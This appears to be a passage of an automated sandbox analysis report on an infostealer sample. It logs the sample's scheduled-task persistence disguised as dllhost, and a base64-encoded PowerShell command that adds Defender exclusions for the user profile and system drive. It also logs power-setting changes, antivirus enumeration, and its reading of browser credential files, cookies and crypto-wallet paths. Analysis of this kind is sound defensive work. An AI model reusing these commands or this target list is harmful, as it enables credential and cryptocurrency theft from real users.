                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate offJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajafuaoqbvadaaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwbpahuasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbtafyaqga1agoadgbvagmaiwa+acaalqbgag8acgbjaguaiaa8acmaqwa4afyaiwa+aa==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajafuaoqbvadaaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwbpahuasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbtafyaqga1agoadgbvagmaiwa+acaalqbgag8acgbjaguaiaa8acmaqwa4afyaiwa+aa=="
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajafuaoqbvadaaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwbpahuasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbtafyaqga1agoadgbvagmaiwa+acaalqbgag8acgbjaguaiaa8acmaqwa4afyaiwa+aa==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate offJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajafuaoqbvadaaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwbpahuasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbtafyaqga1agoadgbvagmaiwa+acaalqbgag8acgbjaguaiaa8acmaqwa4afyaiwa+aa==" Jump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00CFF048
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: EnumSystemLocalesW,0_2_00CFB007
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: EnumSystemLocalesW,0_2_00CFF299
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00CFF334
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: GetLocaleInfoW,0_2_00CFF5E6
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: EnumSystemLocalesW,0_2_00CFF587
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: EnumSystemLocalesW,0_2_00CFF6BB
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00CFF7AD
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: GetLocaleInfoW,0_2_00CFF706
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: GetLocaleInfoW,0_2_00CFF8B3
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: GetLocaleInfoW,0_2_00CFAB0C
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: GetLocaleInfoW,2_2_00CFF8B3
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00CFF048
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: EnumSystemLocalesW,2_2_00CFB007
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: EnumSystemLocalesW,2_2_00CFF299
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: GetLocaleInfoW,2_2_00CFAB0C
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00CFF334
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: GetLocaleInfoW,2_2_00CFF5E6
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: EnumSystemLocalesW,2_2_00CFF587
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: EnumSystemLocalesW,2_2_00CFF6BB
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00CFF7AD
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: GetLocaleInfoW,2_2_00CFF706
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CEE6D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00CEE6D7
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: setupx 1.exe1.exe, 00000002.00000003.1153830614.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139527382.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: Process Memory Space: setupx 1.exe1.exe PID: 6848, type: MEMORYSTR
                  Source: Yara matchFile source: 2.2.setupx 1.exe1.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.setupx 1.exe1.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2253160823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"WL!
                  Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: h\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0H"
                  Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                  Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: e.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t"
                  Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%
                  Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                  Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%
                  Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                  Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
